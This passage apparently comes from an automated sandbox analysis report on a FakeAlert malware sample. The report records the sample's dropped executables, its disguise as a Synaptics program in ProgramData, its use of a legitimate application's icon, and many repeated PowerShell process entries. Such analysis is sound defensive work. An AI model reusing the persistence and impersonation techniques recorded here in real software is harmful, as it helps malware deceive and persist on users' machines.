                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00480210 push 0048023Ch; ret 6_2_00480234
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004842DC push 00484308h; ret 6_2_00484300
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0048036C push 00480398h; ret 6_2_00480390
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042C3D0 push 0042C3FCh; ret 6_2_0042C3F4
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00432468 push 004324B4h; ret 6_2_004324AC
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00486408 push 004864ADh; ret 6_2_004864A5
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0047C404 push 0047C430h; ret 6_2_0047C428
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00432404 push 00432447h; ret 6_2_0043243F
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004324C0 push 0043250Bh; ret 6_2_00432503
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042C4C4 push 0042C4F0h; ret 6_2_0042C4E8
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004464FC push 00446562h; ret 6_2_0044655A
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00490554 push 00490580h; ret 6_2_00490578
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0047A514 push 0047A540h; ret 6_2_0047A538
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00432518 push 00432544h; ret 6_2_0043253C
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00496530 push 00496586h; ret 6_2_0049657E
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0048859C push 004885DEh; ret 6_2_004885D6
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00432650 push 004326C6h; ret 6_2_004326BE
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0049A6BC push 0049A745h; ret 6_2_0049A73D
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00480744 push 00480770h; ret 6_2_00480768
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0049A750 push 0049A776h; ret 6_2_0049A76E
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0048077C push 004807A8h; ret 6_2_004807A0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0048477C push 004847A8h; ret 6_2_004847A0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList,6_2_004730FC

                                Persistence and Installation Behavior

                                barindex
                                Drops PE files to the document folder of the user
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile created: C:\ProgramData\Synaptics\RCXCD96.tmpJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile created: C:\Users\user\Desktop\._cache_uniformerede.exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeFile created: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dllJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Jump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeFile created: C:\Users\user\AppData\Local\Temp\uniformerede.exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\RCXF979.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile created: C:\ProgramData\Synaptics\RCXCD96.tmpJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\RCXDA77.tmpJump to dropped file

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Icon mismatch, binary includes an icon from a different legit application in order to fool users
                                Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (31).png
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,6_2_00459934
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,6_2_0045A054
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,6_2_0045A104
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,6_2_0042C6FC
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0044083C IsIconic,GetCapture,6_2_0044083C
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,6_2_0045695C
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,6_2_004410F0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,6_2_00441A14
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,9_2_00459934
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,9_2_0045A054
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,9_2_0045A104
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,9_2_0042C6FC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0044083C IsIconic,GetCapture,9_2_0044083C
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,9_2_0045695C
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,9_2_004410F0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,9_2_00441A14
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,12_2_00459934
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,12_2_0045A054
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,12_2_0045A104
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,12_2_0042C6FC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0044083C IsIconic,GetCapture,12_2_0044083C
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,12_2_0045695C
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,12_2_004410F0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,12_2_00441A14
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042E3B4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_0042E3B4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
